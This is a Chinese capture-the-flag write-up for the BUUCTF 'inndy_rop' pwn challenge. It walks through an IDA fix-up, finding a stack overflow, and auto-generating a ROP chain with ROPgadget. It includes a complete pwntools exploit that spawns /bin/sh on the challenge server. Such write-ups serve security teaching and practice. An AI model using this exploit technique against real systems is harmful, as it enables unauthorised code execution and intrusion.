• [BUUCTF]PWN——inndy_rop


    inndy_rop

    附件

    步骤:

    1. 例行检查,32位,开启了nx保护
      在这里插入图片描述
    2. 本地调试运行没看出个啥,直接上ida,一开始f5会报错,
      在这里插入图片描述
    3. 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar
      在这里插入图片描述
      在这里插入图片描述
    4. 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可
      在这里插入图片描述
    5. 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞
      在这里插入图片描述
    6. 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的
      这边直接利用了工具ROPgadget,它有一个功能,可以直接利用程序中的片段拼凑rop链。
    ROPgadget --binary rop --ropchain
    

    在这里插入图片描述
    可以看到直接给我们找到了一个应该是写好了的利用exp,只要我们手动加个偏移造成溢出即可

    from pwn import*
    from struct import pack
    
    r=remote('node3.buuoj.cn',26917)
    
    def payload():
            p='a'*(0xc+4)
    	p += pack('<I', 0x0806ecda) # pop edx ; ret
    	p += pack('<I', 0x080ea060) # @ .data
    	p += pack('<I', 0x080b8016) # pop eax ; ret
    	p += '/bin'
    	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    	p += pack('<I', 0x0806ecda) # pop edx ; ret
    	p += pack('<I', 0x080ea064) # @ .data + 4
    	p += pack('<I', 0x080b8016) # pop eax ; ret
    	p += '//sh'
    	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    	p += pack('<I', 0x0806ecda) # pop edx ; ret
    	p += pack('<I', 0x080ea068) # @ .data + 8
    	p += pack('<I', 0x080492d3) # xor eax, eax ; ret
    	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    	p += pack('<I', 0x080481c9) # pop ebx ; ret
    	p += pack('<I', 0x080ea060) # @ .data
    	p += pack('<I', 0x080de769) # pop ecx ; ret
    	p += pack('<I', 0x080ea068) # @ .data + 8
    	p += pack('<I', 0x0806ecda) # pop edx ; ret
    	p += pack('<I', 0x080ea068) # @ .data + 8
    	p += pack('<I', 0x080492d3) # xor eax, eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0807a66f) # inc eax ; ret
    	p += pack('<I', 0x0806c943) # int 0x80
            return p
    
    shell = payload()
    r.sendline(shell)
    r.interactive()
    

    在这里插入图片描述

  • 相关阅读:
    进程间通信
    图形的保存与重绘
    mysql记录1
    文件操作
    多线程及聊天室程序
    健康是成功之本
    文档与串行化
    HTML网页制作基础
    Hook和数据库访问
    C++基础笔记1
  • 原文地址:https://www.cnblogs.com/xlrp/p/14273646.html
Copyright © 2020-2023  润新知